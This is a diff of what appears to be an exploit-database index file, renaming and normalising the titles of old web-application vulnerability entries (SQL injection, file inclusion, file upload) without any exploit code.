+4459,platforms/php/webapps/4459.txt,"ActiveKB KnowledgeBase 2.x - 'catId' Parameter SQL Injection",2007-09-26,Luna-Tic/XTErner,php,webapps,0
 4461,platforms/php/webapps/4461.txt,"lustig.cms Beta 2.5 - (forum.php view) Remote File Inclusion",2007-09-27,GoLd_M,php,webapps,0
 4462,platforms/php/webapps/4462.txt,"Chupix CMS 0.2.3 - (repertoire) Remote File Inclusion",2007-09-27,0in,php,webapps,0
 4463,platforms/php/webapps/4463.txt,"Integramod Nederland 1.4.2 - Remote File Inclusion",2007-09-27,"Mehmet Ince",php,webapps,0
 4464,platforms/php/webapps/4464.txt,"PhFiTo 1.3.0 - (SRC_PATH) Remote File Inclusion",2007-09-28,w0cker,php,webapps,0
 4465,platforms/php/webapps/4465.txt,"public media manager 1.3 - Remote File Inclusion",2007-09-28,0in,php,webapps,0
-4466,platforms/php/webapps/4466.php,"Zomplog 3.8.1 - upload_files.php Arbitrary File Upload",2007-09-28,InATeam,php,webapps,0
+4466,platforms/php/webapps/4466.php,"Zomplog 3.8.1 - Arbitrary File Upload",2007-09-28,InATeam,php,webapps,0
 4467,platforms/php/webapps/4467.pl,"MD-Pro 1.0.76 - SQL Injection",2007-09-29,undefined1_,php,webapps,0
 4469,platforms/php/webapps/4469.txt,"Mambo Component Mambads 1.5 - SQL Injection",2007-09-29,Sniper456,php,webapps,0
 4470,platforms/php/webapps/4470.txt,"mxBB Module mx_glance 2.3.3 - Remote File Inclusion",2007-09-29,bd0rk,php,webapps,0
@@ -18117,7 +18120,7 @@ id,file,description,date,author,platform,type,port
 4807,platforms/php/webapps/4807.php,"jPORTAL 2.3.1 & UserPatch - 'forum.php' Remote Code Execution",2007-12-29,irk4z,php,webapps,0
 4808,platforms/php/webapps/4808.txt,"Mihalism Multi Forum Host 3.0.x - Remote File Inclusion",2007-12-29,GoLd_M,php,webapps,0
 4809,platforms/php/webapps/4809.txt,"CCMS 3.1 Demo - SQL Injection",2007-12-29,Pr0metheuS,php,webapps,0
-4810,platforms/php/webapps/4810.txt,"CMS Made Simple 1.2.2 - (TinyMCE module) SQL Injection",2007-12-30,EgiX,php,webapps,0
+4810,platforms/php/webapps/4810.txt,"CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection",2007-12-30,EgiX,php,webapps,0
 4811,platforms/php/webapps/4811.txt,"kontakt formular 1.4 - Remote File Inclusion",2007-12-30,bd0rk,php,webapps,0
 4812,platforms/php/webapps/4812.txt,"Mihalism Multi Host 2.0.7 - 'download.php' Remote File Disclosure",2007-12-30,GoLd_M,php,webapps,0
 4813,platforms/php/webapps/4813.txt,"XCMS 1.83 - Remote Command Execution",2007-12-30,x0kster,php,webapps,0
@@ -18697,81 +18700,81 @@ id,file,description,date,author,platform,type,port
 5595,platforms/php/webapps/5595.txt,"ClanLite 2.x - SQL Injection / Cross-Site Scripting",2008-05-12,ZoRLu,php,webapps,0
 5596,platforms/php/webapps/5596.txt,"BigACE 2.4 - Multiple Remote File Inclusion",2008-05-12,BiNgZa,php,webapps,0
 5597,platforms/php/webapps/5597.pl,"Battle.net Clan Script 1.5.x - SQL Injection",2008-05-12,Stack,php,webapps,0
-5598,platforms/php/webapps/5598.txt,"Mega File Hosting Script 1.2 - (fid) SQL Injection",2008-05-12,TurkishWarriorr,php,webapps,0
+5598,platforms/php/webapps/5598.txt,"Mega File Hosting Script 1.2 - 'fid' Parameter SQL Injection",2008-05-12,TurkishWarriorr,php,webapps,0
 5599,platforms/php/webapps/5599.txt,"PHP Classifieds Script 05122008 - SQL Injection",2008-05-12,InjEctOr5,php,webapps,0
-5600,platforms/php/webapps/5600.php,"CMS Made Simple 1.2.4 - (FileManager module) Arbitrary File Upload",2008-05-12,EgiX,php,webapps,0
+5600,platforms/php/webapps/5600.php,"CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload",2008-05-12,EgiX,php,webapps,0
 5601,platforms/php/webapps/5601.pl,"Advanced Image Hosting (AIH) 2.1 - SQL Injection",2008-05-12,Stack,php,webapps,0
-5602,platforms/php/webapps/5602.txt,"AJ HYIP ACME - 'topic_detail.php id' SQL Injection",2008-05-12,InjEctOr5,php,webapps,0
+5602,platforms/php/webapps/5602.txt,"AJ HYIP ACME - 'topic_detail.php' SQL Injection",2008-05-12,InjEctOr5,php,webapps,0
-5603,platforms/php/webapps/5603.txt,"EQDKP 1.3.2f - (user_id) Authentication Bypass (PoC)",2008-05-13,vortfu,php,webapps,0
+5603,platforms/php/webapps/5603.txt,"EQdkp 1.3.2f - 'user_id' Authentication Bypass (PoC)",2008-05-13,vortfu,php,webapps,0
-5604,platforms/php/webapps/5604.txt,"e107 Plugin BLOG Engine 2.2 - (rid) Blind SQL Injection",2008-05-13,Saime,php,webapps,0
+5604,platforms/php/webapps/5604.txt,"e107 Plugin BLOG Engine 2.2 - 'rid' Parameter Blind SQL Injection",2008-05-13,Saime,php,webapps,0
 5605,platforms/php/webapps/5605.txt,"e-107 Plugin ZoGo-Shop 1.16 Beta 13 - SQL Injection",2008-05-13,Cr@zy_King,php,webapps,0
 5606,platforms/php/webapps/5606.txt,"Web Group Communication Center (WGCC) 1.0.3 - SQL Injection",2008-05-13,myvx,php,webapps,0
-5607,platforms/php/webapps/5607.txt,"CaLogic Calendars 1.2.2 - (langsel) SQL Injection",2008-05-13,His0k4,php,webapps,0
+5607,platforms/php/webapps/5607.txt,"CaLogic Calendars 1.2.2 - 'langsel' Parameter SQL Injection",2008-05-13,His0k4,php,webapps,0
 5608,platforms/asp/webapps/5608.txt,"Meto Forum 1.1 - Multiple SQL Injections",2008-05-13,U238,asp,webapps,0
-5609,platforms/php/webapps/5609.txt,"EMO Realty Manager - 'news.php ida' SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0
+5609,platforms/php/webapps/5609.txt,"EMO Realty Manager - 'ida' Parameter SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0
-5610,platforms/php/webapps/5610.txt,"The Real Estate Script - 'dpage.php docID' SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0
+5610,platforms/php/webapps/5610.txt,"The Real Estate Script - 'docID' Parameter SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0
-5611,platforms/php/webapps/5611.txt,"Linkspile - 'link.php cat_id' SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0
+5611,platforms/php/webapps/5611.txt,"Linkspile - 'cat_id' Parameter SQL Injection",2008-05-13,HaCkeR_EgY,php,webapps,0
-5613,platforms/php/webapps/5613.txt,"Freelance Auction Script 1.0 - (browseproject.php) SQL Injection",2008-05-14,t0pP8uZz,php,webapps,0
+5613,platforms/php/webapps/5613.txt,"Freelance Auction Script 1.0 - 'browseproject.php' SQL Injection",2008-05-14,t0pP8uZz,php,webapps,0
 5614,platforms/php/webapps/5614.txt,"Feedback and Rating Script 1.0 - 'detail.php' SQL Injection",2008-05-14,t0pP8uZz,php,webapps,0
 5615,platforms/php/webapps/5615.txt,"AS-GasTracker 1.0.0 - Insecure Cookie Handling",2008-05-14,t0pP8uZz,php,webapps,0
 5616,platforms/php/webapps/5616.txt,"ActiveKB 1.5 - Insecure Cookie Handling/Arbitrary Admin Access",2008-05-14,t0pP8uZz,php,webapps,0
 5617,platforms/php/webapps/5617.txt,"Internet PhotoShow (Special Edition) - Insecure Cookie Handling",2008-05-14,t0pP8uZz,php,webapps,0
 5618,platforms/php/webapps/5618.txt,"Lanius CMS 1.2.16 - 'FCKeditor' Arbitrary File Upload",2008-05-14,EgiX,php,webapps,0
-5620,platforms/php/webapps/5620.txt,"rgboard 3.0.12 - (Remote File Inclusioni / Cross-Site Scripting) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0
+5620,platforms/php/webapps/5620.txt,"rgboard 3.0.12 - Remote File Inclusioni / Cross-Site Scripting",2008-05-14,e.wiZz!,php,webapps,0
-5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript - (page_to_include) Remote File Inclusion",2008-05-14,HaCkeR_EgY,php,webapps,0
+5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript - Remote File Inclusion",2008-05-14,HaCkeR_EgY,php,webapps,0
 5623,platforms/php/webapps/5623.txt,"Kostenloses Linkmanagementscript - SQL Injection",2008-05-15,"Virangar Security",php,webapps,0
-5624,platforms/php/webapps/5624.txt,"newsmanager 2.0 - (Remote File Inclusion / File Disclosure / SQL Injection / pb) Multiple Vulnerabilities",2008-05-15,GoLd_M,php,webapps,0
+5624,platforms/php/webapps/5624.txt,"newsmanager 2.0 - Remote File Inclusion / File Disclosure / SQL Injection",2008-05-15,GoLd_M,php,webapps,0
-5626,platforms/php/webapps/5626.txt,"68 Classifieds 4.0 - (category.php cat) SQL Injection",2008-05-15,HaCkeR_EgY,php,webapps,0
+5626,platforms/php/webapps/5626.txt,"68 Classifieds 4.0 - 'category.php' SQL Injection",2008-05-15,HaCkeR_EgY,php,webapps,0
 5627,platforms/php/webapps/5627.pl,"Pet Grooming Management System 2.0 - Arbitrary Add Admin",2008-05-15,t0pP8uZz,php,webapps,0
 5628,platforms/php/webapps/5628.txt,"RantX 1.0 - Insecure Admin Authentication",2008-05-15,t0pP8uZz,php,webapps,0
 5629,platforms/php/webapps/5629.txt,"Web Slider 0.6 - Insecure Cookie/Authentication Handling",2008-05-15,t0pP8uZz,php,webapps,0
 5630,platforms/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 - Insecure Cookie Handling",2008-05-15,t0pP8uZz,php,webapps,0
 5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 - Multiple SQL Injections",2008-05-15,cOndemned,php,webapps,0
-5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS - (default.asp id) SQL Injection",2008-05-16,JosS,asp,webapps,0
+5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS - SQL Injection",2008-05-16,JosS,asp,webapps,0
 5634,platforms/php/webapps/5634.htm,"Zomplog 3.8.2 - 'newuser.php' Arbitrary Add Admin",2008-05-16,ArxWolf,php,webapps,0
-5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 - (post_id) SQL Injection",2008-05-16,Stack,php,webapps,0
+5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 - 'post_id' Parameter SQL Injection",2008-05-16,Stack,php,webapps,0
 5636,platforms/php/webapps/5636.txt,"Zomplog 3.8.2 - 'force_download.php' File Disclosure",2008-05-16,Stack,php,webapps,0
-5637,platforms/php/webapps/5637.txt,"WR-Meeting 1.0 - (msnum) Local File Disclosure",2008-05-17,Cr@zy_King,php,webapps,0
+5637,platforms/php/webapps/5637.txt,"WR-Meeting 1.0 - 'msnum' Parameter Local File Disclosure",2008-05-17,Cr@zy_King,php,webapps,0
 5638,platforms/php/webapps/5638.txt,"How2ASP.net WebBoard 4.1 - SQL Injection",2008-05-17,"CWH Underground",php,webapps,0
-5639,platforms/php/webapps/5639.pl,"FicHive 1.0 - (category) Blind SQL Injection",2008-05-17,His0k4,php,webapps,0
+5639,platforms/php/webapps/5639.pl,"FicHive 1.0 - 'category' Parameter Blind SQL Injection",2008-05-17,His0k4,php,webapps,0
-5640,platforms/php/webapps/5640.py,"Smeego 1.0 - (Cookie lang) Local File Inclusion",2008-05-17,0in,php,webapps,0
+5640,platforms/php/webapps/5640.py,"Smeego 1.0 - 'Cookie lang' Local File Inclusion",2008-05-17,0in,php,webapps,0
 5641,platforms/php/webapps/5641.txt,"CMS WebManager-Pro - Multiple SQL Injections",2008-05-18,dun,php,webapps,0
-5642,platforms/php/webapps/5642.txt,"TAGWORX.CMS - Multiple SQL Injections",2008-05-18,dun,php,webapps,0
+5642,platforms/php/webapps/5642.txt,"TAGWORX.CMS 3.00.02 - Multiple SQL Injections",2008-05-18,dun,php,webapps,0
 5643,platforms/php/webapps/5643.txt,"Ajax Framework - 'lang' Local File Inclusion",2008-05-18,dun,php,webapps,0
-5644,platforms/php/webapps/5644.txt,"lulieblog 1.2 - Multiple Vulnerabilities",2008-05-18,Cod3rZ,php,webapps,0
+5644,platforms/php/webapps/5644.txt,"Lulieblog 1.2 - Multiple Vulnerabilities",2008-05-18,Cod3rZ,php,webapps,0
-5645,platforms/php/webapps/5645.txt,"AlkalinePHP 0.77.35 - (adduser.php) Arbitrary Add Admin",2008-05-18,t0pP8uZz,php,webapps,0
+5645,platforms/php/webapps/5645.txt,"AlkalinePHP 0.77.35 - 'adduser.php' Arbitrary Add Admin",2008-05-18,t0pP8uZz,php,webapps,0
-5646,platforms/php/webapps/5646.txt,"easycms 0.4.2 - Multiple Vulnerabilities",2008-05-18,t0pP8uZz,php,webapps,0
+5646,platforms/php/webapps/5646.txt,"Easycms 0.4.2 - Multiple Vulnerabilities",2008-05-18,t0pP8uZz,php,webapps,0
 5647,platforms/php/webapps/5647.txt,"GNU/Gallery 1.1.1.0 - 'admin.php' Local File Inclusion",2008-05-18,t0pP8uZz,php,webapps,0
 5648,platforms/php/webapps/5648.pl,"MeltingIce File System 1.0 - Arbitrary Add User Exploit",2008-05-18,t0pP8uZz,php,webapps,0
 5649,platforms/php/webapps/5649.pl,"PHP-AGTC Membership System 1.1a - Arbitrary Add Admin",2008-05-18,t0pP8uZz,php,webapps,0
 5650,platforms/php/webapps/5650.pl,"MyPicGallery 1.0 - Arbitrary Add Admin",2008-05-18,t0pP8uZz,php,webapps,0
 5651,platforms/php/webapps/5651.txt,"microssys CMS 1.5 - Remote File Inclusion",2008-05-19,Raz0r,php,webapps,0
-5652,platforms/php/webapps/5652.pl,"AlkalinePHP 0.80.00 Beta - (thread.php id) SQL Injection",2008-05-19,Stack,php,webapps,0
+5652,platforms/php/webapps/5652.pl,"AlkalinePHP 0.80.00 Beta - 'thread.php' SQL Injection",2008-05-19,Stack,php,webapps,0
 5653,platforms/php/webapps/5653.php,"MercuryBoard 1.1.5 - 'login.php' Blind SQL Injection",2008-05-19,EgiX,php,webapps,0
-5654,platforms/php/webapps/5654.txt,"EntertainmentScript - 'play.php id' SQL Injection",2008-05-19,Mr.SQL,php,webapps,0
+5654,platforms/php/webapps/5654.txt,"EntertainmentScript 1.4.0 - 'play.php' SQL Injection",2008-05-19,Mr.SQL,php,webapps,0
 5655,platforms/php/webapps/5655.pl,"EntertainmentScript 1.4.0 - 'page.php' Local File Inclusion",2008-05-20,Stack,php,webapps,0
-5656,platforms/php/webapps/5656.txt,"ecms 0.4.2 - (SQL Injection / Security Bypass) Multiple Vulnerabilities",2008-05-20,"Virangar Security",php,webapps,0
+5656,platforms/php/webapps/5656.txt,"eCMS 0.4.2 - SQL Injection / Security Bypass",2008-05-20,"Virangar Security",php,webapps,0
-5657,platforms/php/webapps/5657.txt,"Mantis Bug Tracker 1.1.1 - (Code Execution / Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2008-05-20,USH,php,webapps,0
+5657,platforms/php/webapps/5657.txt,"Mantis Bug Tracker 1.1.1 - Code Execution / Cross-Site Scripting / Cross-Site Request Forgery",2008-05-20,USH,php,webapps,0
-5658,platforms/php/webapps/5658.txt,"ComicShout 2.5 - (index.php comic_id) SQL Injection",2008-05-20,Niiub,php,webapps,0
+5658,platforms/php/webapps/5658.txt,"ComicShout 2.5 - 'comic_id' Parameter SQL Injection",2008-05-20,Niiub,php,webapps,0
 5659,platforms/php/webapps/5659.txt,"MX-System 2.7.3 - 'index.php' SQL Injection",2008-05-20,cOndemned,php,webapps,0
-5660,platforms/php/webapps/5660.txt,"PHP Jokesite 2.0 - 'cat_id' SQL Injection",2008-05-20,InjEctOr5,php,webapps,0
+5660,platforms/php/webapps/5660.txt,"PHP Jokesite 2.0 - 'cat_id' Parameter SQL Injection",2008-05-20,InjEctOr5,php,webapps,0
-5661,platforms/php/webapps/5661.txt,"Netious CMS 0.4 - (index.php pageid) SQL Injection",2008-05-21,InjEctOr5,php,webapps,0
+5661,platforms/php/webapps/5661.txt,"Netious CMS 0.4 - 'pageid' Parameter SQL Injection",2008-05-21,InjEctOr5,php,webapps,0
 5662,platforms/cgi/webapps/5662.txt,"Alcatel OmniPCX Office 210/061.1 - Remote Command Execution",2008-05-21,DSecRG,cgi,webapps,0
-5663,platforms/php/webapps/5663.txt,"6rbScript - 'news.php newsid' SQL Injection",2008-05-21,"Hussin X",php,webapps,0
+5663,platforms/php/webapps/5663.txt,"6rbScript - 'news.php' SQL Injection",2008-05-21,"Hussin X",php,webapps,0
-5664,platforms/php/webapps/5664.txt,"webl?sninger 4 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-05-21,Mr.SQL,php,webapps,0
+5664,platforms/php/webapps/5664.txt,"Weblosninger 4 - Cross-Site Scripting / SQL Injection",2008-05-21,Mr.SQL,php,webapps,0
 5665,platforms/php/webapps/5665.txt,"Netbutikker 4 - SQL Injection",2008-05-21,Mr.SQL,php,webapps,0
-5666,platforms/php/webapps/5666.txt,"e107 Plugin BLOG Engine 2.2 - 'uid' Blind SQL Injection",2008-05-22,"Virangar Security",php,webapps,0
+5666,platforms/php/webapps/5666.txt,"e107 Plugin BLOG Engine 2.2 - 'uid' Parameter Blind SQL Injection",2008-05-22,"Virangar Security",php,webapps,0
-5668,platforms/php/webapps/5668.txt,"Quate CMS 0.3.4 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting / dt) Multiple Vulnerabilities",2008-05-23,DSecRG,php,webapps,0
+5668,platforms/php/webapps/5668.txt,"Quate CMS 0.3.4 - Multiple Vulnerabilities",2008-05-23,DSecRG,php,webapps,0
 5669,platforms/php/webapps/5669.txt,"OneCMS 2.5 - 'install_mod.php' Local File Inclusion",2008-05-23,DSecRG,php,webapps,0
-5670,platforms/php/webapps/5670.txt,"RoomPHPlanning 1.5 - (idresa) SQL Injection",2008-05-24,His0k4,php,webapps,0
+5670,platforms/php/webapps/5670.txt,"RoomPHPlanning 1.5 - 'idresa' Parameter SQL Injection",2008-05-24,His0k4,php,webapps,0
-5671,platforms/php/webapps/5671.txt,"PHPRaider 1.0.7 - (PHPbb3.functions.php) Remote File Inclusion",2008-05-24,Kacak,php,webapps,0
+5671,platforms/php/webapps/5671.txt,"PHPRaider 1.0.7 - 'PHPbb3.functions.php' Remote File Inclusion",2008-05-24,Kacak,php,webapps,0
 5672,platforms/php/webapps/5672.txt,"plusphp url shortening software 1.6 - Remote File Inclusion",2008-05-25,DR.TOXIC,php,webapps,0
 5673,platforms/php/webapps/5673.txt,"Xomol CMS 1.2 - Login Bypass / Local File Inclusion",2008-05-25,DNX,php,webapps,0
 5674,platforms/php/webapps/5674.txt,"RoomPHPlanning 1.5 - Arbitrary Add Admin",2008-05-26,Stack,php,webapps,0
 5675,platforms/php/webapps/5675.txt,"RoomPHPlanning 1.5 - Multiple SQL Injections",2008-05-26,"Virangar Security",php,webapps,0
-5676,platforms/php/webapps/5676.txt,"CMS MAXSITE 1.10 - (category) SQL Injection",2008-05-26,Tesz,php,webapps,0
+5676,platforms/php/webapps/5676.txt,"CMS MAXSITE 1.10 - 'category' Parameter SQL Injection",2008-05-26,Tesz,php,webapps,0
 5677,platforms/php/webapps/5677.txt,"RevokeBB 1.0 RC11 - 'Search' SQL Injection",2008-05-27,The:Paradox,php,webapps,0
-5678,platforms/php/webapps/5678.txt,"CKGold Shopping Cart 2.5 - (category_id) SQL Injection",2008-05-27,Cr@zy_King,php,webapps,0
+5678,platforms/php/webapps/5678.txt,"CKGold Shopping Cart 2.5 - 'category_id' Parameter SQL Injection",2008-05-27,Cr@zy_King,php,webapps,0
 5680,platforms/php/webapps/5680.txt,"OtomiGen.x 2.2 - 'lang' Local File Inclusion",2008-05-27,Saime,php,webapps,0
 5683,platforms/php/webapps/5683.txt,"PHPhotoalbum 0.5 - Multiple SQL Injections",2008-05-28,cOndemned,php,webapps,0
 5684,platforms/php/webapps/5684.txt,"Joomla! Component Artist (idgalery) - SQL Injection",2008-05-28,Cr@zy_King,php,webapps,0
@@ -18797,7 +18800,7 @@ id,file,description,date,author,platform,type,port
 5708,platforms/php/webapps/5708.txt,"Joomla! Component prayercenter 1.4.9 - 'id' SQL Injection",2008-05-31,His0k4,php,webapps,0
 5710,platforms/php/webapps/5710.pl,"Joomla! Component com_biblestudy 1.5.0 - 'id' SQL Injection",2008-05-31,Stack,php,webapps,0
 5711,platforms/php/webapps/5711.txt,"Social Site Generator 2.0 - Multiple Remote File Disclosure Vulnerabilities",2008-06-01,Stack,php,webapps,0
-5713,platforms/php/webapps/5713.txt,"ComicShout 2.8 - (news.php news_id) SQL Injection",2008-06-01,JosS,php,webapps,0
+5713,platforms/php/webapps/5713.txt,"ComicShout 2.8 - 'news_id' Parameter SQL Injection",2008-06-01,JosS,php,webapps,0
 5714,platforms/php/webapps/5714.pl,"Joomla! Component com_mycontent 1.1.13 - Blind SQL Injection",2008-06-01,His0k4,php,webapps,0
 5715,platforms/php/webapps/5715.txt,"DesktopOnNet 3 Beta - Multiple Remote File Inclusion",2008-06-01,MK,php,webapps,0
 5716,platforms/php/webapps/5716.txt,"mebiblio 0.4.7 - (SQL Injection / Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-01,"CWH Underground",php,webapps,0
@@ -18949,7 +18952,7 @@ id,file,description,date,author,platform,type,port
 5887,platforms/php/webapps/5887.pl,"LE.CMS 1.4 - Arbitrary File Upload",2008-06-21,t0pP8uZz,php,webapps,0
 5888,platforms/php/webapps/5888.txt,"CCLeague Pro 1.2 - Insecure Cookie Authentication",2008-06-21,t0pP8uZz,php,webapps,0
 5889,platforms/php/webapps/5889.txt,"OFFL 0.2.6 - (teams.php fflteam) SQL Injection",2008-06-21,t0pP8uZz,php,webapps,0
-5890,platforms/php/webapps/5890.txt,"AJ HYIP ACME - 'news.php id' SQL Injection",2008-06-21,"Hussin X",php,webapps,0
+5890,platforms/php/webapps/5890.txt,"AJ HYIP ACME - 'news.php' SQL Injection",2008-06-21,"Hussin X",php,webapps,0
 5892,platforms/php/webapps/5892.txt,"phpAuction 3.2.1 - (item.php id) SQL Injection",2008-06-21,"Hussin X",php,webapps,0
 5893,platforms/php/webapps/5893.txt,"Joomla! Component EXP Shop - 'catid' SQL Injection",2008-06-22,His0k4,php,webapps,0
 5894,platforms/asp/webapps/5894.txt,"DUdForum 3.0 - (forum.asp iFor) SQL Injection",2008-06-22,Bl@ckbe@rD,asp,webapps,0
@@ -19211,7 +19214,7 @@ id,file,description,date,author,platform,type,port
 6208,platforms/php/webapps/6208.txt,"Multiple Wsn Products - (Local File Inclusion) Code Execution",2008-08-06,otmorozok428,php,webapps,0
 6209,platforms/php/webapps/6209.rb,"LoveCMS 1.6.2 Final - Remote Code Execution",2008-08-06,PoMdaPiMp,php,webapps,0
 6210,platforms/php/webapps/6210.rb,"LoveCMS 1.6.2 Final - Update Settings Remote Exploit",2008-08-06,PoMdaPiMp,php,webapps,0
-6211,platforms/php/webapps/6211.txt,"Quate CMS 0.3.4 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-08-06,CraCkEr,php,webapps,0
+6211,platforms/php/webapps/6211.txt,"Quate CMS 0.3.4 - Local File Inclusion / Cross-Site Scripting",2008-08-06,CraCkEr,php,webapps,0
 6213,platforms/php/webapps/6213.txt,"Free Hosting Manager 1.2/2.0 - Insecure Cookie Handling",2008-08-06,Scary-Boys,php,webapps,0
 6214,platforms/php/webapps/6214.php,"Discuz! 6.0.1 - (searchid) SQL Injection",2008-08-06,james,php,webapps,0
 6215,platforms/php/webapps/6215.txt,"pPIM 1.0 - (Arbitrary File Delete / Cross-Site Scripting) Multiple Vulnerabilities",2008-08-10,BeyazKurt,php,webapps,0
@@ -19283,12 +19286,12 @@ id,file,description,date,author,platform,type,port
 6342,platforms/php/webapps/6342.txt,"EasyClassifields 3.0 - (go) SQL Injection",2008-09-01,e.wiZz!,php,webapps,0
 6343,platforms/php/webapps/6343.txt,"CMSbright - (id_rub_page) SQL Injection",2008-09-01,"BorN To K!LL",php,webapps,0
 6344,platforms/php/webapps/6344.php,"WeBid 0.5.4 - 'FCKeditor' Arbitrary File Upload",2008-09-01,Stack,php,webapps,0
-6346,platforms/php/webapps/6346.pl,"e107 Plugin BLOG Engine 2.2 - 'uid' SQL Injection",2008-09-01,"Virangar Security",php,webapps,0
+6346,platforms/php/webapps/6346.pl,"e107 Plugin BLOG Engine 2.2 - 'uid' Parameter SQL Injection",2008-09-01,"Virangar Security",php,webapps,0
 6347,platforms/php/webapps/6347.txt,"myPHPNuke < 1.8.8_8rc2 - (artid) SQL Injection",2008-09-02,MustLive,php,webapps,0
 6348,platforms/php/webapps/6348.txt,"Coupon Script 4.0 - 'id' SQL Injection",2008-09-02,"Hussin X",php,webapps,0
 6349,platforms/php/webapps/6349.txt,"Reciprocal Links Manager 1.1 - (site) SQL Injection",2008-09-02,"Hussin X",php,webapps,0
-6350,platforms/php/webapps/6350.txt,"AJ HYIP ACME - 'comment.php artid' SQL Injection",2008-09-02,"security fears team",php,webapps,0
+6350,platforms/php/webapps/6350.txt,"AJ HYIP ACME - 'comment.php' SQL Injection",2008-09-02,"security fears team",php,webapps,0
-6351,platforms/php/webapps/6351.txt,"AJ HYIP ACME - 'readarticle.php artid' SQL Injection",2008-09-02,InjEctOr5,php,webapps,0
+6351,platforms/php/webapps/6351.txt,"AJ HYIP ACME - 'readarticle.php' SQL Injection",2008-09-02,InjEctOr5,php,webapps,0
 6352,platforms/php/webapps/6352.txt,"CS-Cart 1.3.5 - (Authentication Bypass) SQL Injection",2008-09-02,"GulfTech Security",php,webapps,0
 6354,platforms/php/webapps/6354.txt,"Spice Classifieds - (cat_path) SQL Injection",2008-09-03,InjEctOr5,php,webapps,0
 6356,platforms/php/webapps/6356.php,"Moodle 1.8.4 - Remote Code Execution",2008-09-03,zurlich.lpt,php,webapps,0
@@ -19405,7 +19408,7 @@ id,file,description,date,author,platform,type,port
 6508,platforms/php/webapps/6508.txt,"Basic PHP Events Lister 1.0 - SQL Injection",2008-09-21,0x90,php,webapps,0
 6509,platforms/cgi/webapps/6509.txt,"TWiki 4.2.2 - 'action' Remote Code Execution",2008-09-21,webDEViL,cgi,webapps,0
 6510,platforms/php/webapps/6510.txt,"PHPKB 1.5 Professional - Multiple SQL Injections",2008-09-21,d3v1l,php,webapps,0
-6511,platforms/php/webapps/6511.txt,"6rbScript 3.3 - 'singerid' SQL Injection",2008-09-21,"Hussin X",php,webapps,0
+6511,platforms/php/webapps/6511.txt,"6rbScript 3.3 - 'singerid' Parameter SQL Injection",2008-09-21,"Hussin X",php,webapps,0
 6512,platforms/php/webapps/6512.txt,"Diesel Job Site - (job_id) Blind SQL Injection",2008-09-21,Stack,php,webapps,0
 6513,platforms/php/webapps/6513.txt,"Rianxosencabos CMS 0.9 - Arbitrary Add Admin",2008-09-21,"CWH Underground",php,webapps,0
 6514,platforms/php/webapps/6514.txt,"AvailScript Jobs Portal Script - Authenticated Arbitrary File Upload",2008-09-21,InjEctOr5,php,webapps,0
@@ -19413,7 +19416,7 @@ id,file,description,date,author,platform,type,port
 6517,platforms/php/webapps/6517.txt,"Netartmedia Jobs Portal 1.3 - Multiple SQL Injections",2008-09-21,Encrypt3d.M!nd,php,webapps,0
 6518,platforms/php/webapps/6518.txt,"Netartmedia Real Estate Portal 1.2 - SQL Injection",2008-09-21,Encrypt3d.M!nd,php,webapps,0
 6519,platforms/php/webapps/6519.php,"PHP iCalendar 2.24 - (cookie_language) Local File Inclusion / Arbitrary File Upload",2008-09-21,EgiX,php,webapps,0
-6520,platforms/php/webapps/6520.txt,"6rbScript 3.3 - (section.php name) Local File Inclusion",2008-09-21,Stack,php,webapps,0
+6520,platforms/php/webapps/6520.txt,"6rbScript 3.3 - 'section.php' Local File Inclusion",2008-09-21,Stack,php,webapps,0
 6521,platforms/php/webapps/6521.txt,"Rianxosencabos CMS 0.9 - Insecure Cookie Handling",2008-09-21,Stack,php,webapps,0
 6522,platforms/php/webapps/6522.txt,"AvailScript Article Script - 'view.php v' SQL Injection",2008-09-21,"Hussin X",php,webapps,0
 6523,platforms/php/webapps/6523.php,"WCMS 1.0b - Arbitrary Add Admin",2008-09-22,"CWH Underground",php,webapps,0
@@ -20649,7 +20652,7 @@ id,file,description,date,author,platform,type,port
 8195,platforms/php/webapps/8195.txt,"WeBid 0.7.3 RC9 - Multiple Remote File Inclusion",2009-03-10,K-159,php,webapps,0
 8196,platforms/php/webapps/8196.txt,"WordPress MU < 2.7 - 'HOST' HTTP Header Cross-Site Scripting",2009-03-10,"Juan Galiana Lara",php,webapps,0
 8197,platforms/php/webapps/8197.txt,"Joomla! Component Djice Shoutbox 1.0 - Permanent Cross-Site Scripting",2009-03-10,XaDoS,php,webapps,0
-8198,platforms/php/webapps/8198.pl,"RoomPHPlanning 1.6 - (userform.php) Create Admin User Exploit",2009-03-10,"Jonathan Salwan",php,webapps,0
+8198,platforms/php/webapps/8198.pl,"RoomPHPlanning 1.6 - 'userform.php' Create Admin User",2009-03-10,"Jonathan Salwan",php,webapps,0
 8202,platforms/php/webapps/8202.htm,"Traidnt up 2.0 - 'cookie' Add Extension Bypass Exploit",2009-03-11,SP4rT,php,webapps,0
 8204,platforms/php/webapps/8204.txt,"phpmysport 1.4 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-03-12,XaDoS,php,webapps,0
 8207,platforms/php/webapps/8207.txt,"YAP 1.1.1 - 'index.php' Local File Inclusion",2009-03-13,Alkindiii,php,webapps,0
@@ -20661,9 +20664,9 @@ id,file,description,date,author,platform,type,port
 8226,platforms/php/webapps/8226.txt,"PHPRunner 4.2 - (SearchOption) Blind SQL Injection",2009-03-17,BugReport.IR,php,webapps,0
